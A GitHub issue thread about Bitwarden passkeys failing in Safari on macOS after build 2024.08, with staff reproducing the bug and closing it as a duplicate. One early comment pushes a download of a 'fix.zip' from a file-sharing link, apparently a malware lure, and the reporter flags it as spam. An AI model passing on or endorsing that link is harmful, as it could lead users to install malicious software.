### ISSUE TITLE
Safari: Passkeys don't work anymore since 2024.08

### ISSUE THREAD

**Issue by marcolaux** [bitwarden/clients#10714] opened 2024-08-25 08:14 UTC
### Steps To Reproduce

1. Goto a website that you have saved a Passkey within Bitwarden for
2. The Bitwarden dialog doesn't popup on login and I'm unable to choose Bitwarden as my Passkeys provider. Only the OS one pops up. I tried this multiple times with different services.

### Expected Result

Passkeys dialog should popup like before.

### Actual Result

Unable to use Bitwardens Passkeys

### Operating System

macOS

### Web Browser

Safari

### Build Version

2024.08

### Issue Tracking Info

- [x] I understand that work is tracked outside of Github. A PR will be linked to this issue should one be opened to address it, but Bitwarden doesn't use fields like "assigned", "milestone", or "project" to track progress.

**Comment by AlecsSantos** [comment] 2024-08-25 08:23
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by SergeantConfused** [comment] 2024-08-25 13:16
Hello @marcolaux,

Thank you for your report. I was able to reproduce this behaviour and have flagged it to the Engineering department.
Please feel free to post additional information, such as screenshots or a screen video recordings, if you wish.

Thank you again,

**Comment by marcolaux** [comment] 2024-08-25 13:22
> Hello @marcolaux,
> 
> Thank you for your report. I was able to reproduce this behaviour and have flagged it to the Engineering department. Please feel free to post additional information, such as screenshots or a screen video recordings, if you wish.
> 
> Thank you again,

super, thank you for the reply.

btw. are you able to delete the spam above in this issue?

**Comment by cagonzalezcs** [comment] 2024-08-26 12:30
While this refers to a different feature in the extension that isn't work as expected, the root cause is related to the behavior experienced in https://github.com/bitwarden/clients/issues/10715#issuecomment-2310093066

I'm closing this thread as a duplicate, any discussion revolving around this problem should be continued in that thread.

**Closed by cagonzalezcs** 2024-08-26 12:30 UTC
Labels: bug, browser
